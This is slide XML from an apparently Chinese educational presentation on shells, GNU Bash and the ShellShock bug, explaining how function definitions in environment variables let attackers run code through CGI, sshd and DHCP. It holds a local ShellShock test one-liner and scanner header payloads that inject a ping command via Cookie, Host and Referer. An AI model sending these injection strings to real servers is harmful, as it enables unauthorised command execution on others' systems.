                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>this is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>test”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10" y="2996951"/>
            <a:ext cx="8230946" cy="9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5369"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="445510" y="4797152"/>
            <a:ext cx="8230946" cy="133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45510" y="4221089"/>
            <a:ext cx="8230946" cy="504055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> x='() { (a)=&gt;\' bash -c "echo date"; cat echo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32549881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Bash Bugs -- ShellShock</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="2785864"/>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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Bug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>如果只在本地出现的话，基本可以忽略，但是这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Bug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>的严重性在于它能注入到协议请求里，从而能在远程服务器上执行，并可以对服务器进行攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>4.3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>版本之前的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GNU bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>会对环境变量值中函数定义后的字符串进行处理，这使得远程攻击者可以精心布局从而执行任意的代码，已知的途径包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>OpenSSH sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ForceCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>特性，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Apache HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>服务器中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>modcgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>以及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>modcgid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>模块，未知</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DHCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>客户端所执行的脚本，以及其它在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>设置环境</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>变量的场景中都会出现跨越权限边界的问题</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="490237" y="4221088"/>
            <a:ext cx="8208912" cy="156966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http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html) </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="16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http-header = Cookie:() { :; }; ping -c 3 209.126.230.74</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="16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http-header = Host:() { :; }; ping -c 3 209.126.230.74</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="16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333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http-header = Referer:() { :; }; ping -c 3 209.126.230.74</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN"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797272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ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Any Questions?</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="355434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smtClean="0"/>
              <a:t>END</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Thank you!</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="784376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sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463890" y="1628800"/>
            <a:ext cx="8229600" cy="625624"/>
          </a:xfrm>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent3"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="内容占位符 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463890" y="2636912"/>
            <a:ext cx="8229600" cy="625624"/>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dk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dk1"/>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dk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dk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dk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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>GNU Bash Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="内容占位符 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="461363" y="3717032"/>
            <a:ext cx="8229600" cy="625624"/>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dk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dk1"/>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dk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dk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dk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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Funny Bash</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="内容占位符 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463890" y="4811039"/>
            <a:ext cx="8229600" cy="625624"/>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dk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dk1"/>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dk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dk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dk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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Bash Bugs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="494121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smtClean="0"/>
              <a:t>Shell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="内容占位符 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219201"/>
            <a:ext cx="8229600" cy="2065784"/>
          </a:xfrm>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="1003">
            <a:schemeClr val="lt2"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="major"/>
        </p:style>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>计算机科学中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>俗称壳（用来区别于核），是指“提供使用者使用界面”的软件（命令解析器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
              <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>同时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>它又是一种程序设计语言。作为命令语言，它交互式解释和执行用户输入的命令或者自动地解释和执行预先设定好的一连串的命令；作为程序设计语言，它定义了各种变量和参数，并提供了许多在高级语言中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>才具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>有的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>控制结构</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>，包括循环和分支</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="新宋体" pitchFamily="49" charset="-122"/>
              <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11266" name="Picture 2" descr="C:\Users\LKJ2063591\AppData\Roaming\feiq\RichOle\2418237921.bmp"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="1323" t="5255" r="22671" b="40088"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="467544" y="3409139"/>
            <a:ext cx="4104456" cy="287900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Users\LKJ2063591\AppData\Roaming\feiq\RichOle\794900822.bmp"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="782" t="3719" r="38470" b="48141"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4644008" y="3389521"/>
            <a:ext cx="4032448" cy="289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75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分类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	</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040657820"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1219200"/>
          <a:ext cx="8229600" cy="509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418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GNU Bash Shell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="511988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altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Bash(Bourne-Again Shell)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>一个为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GNU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>计划编写的</a:t>
            </a:r>
            <a:r>
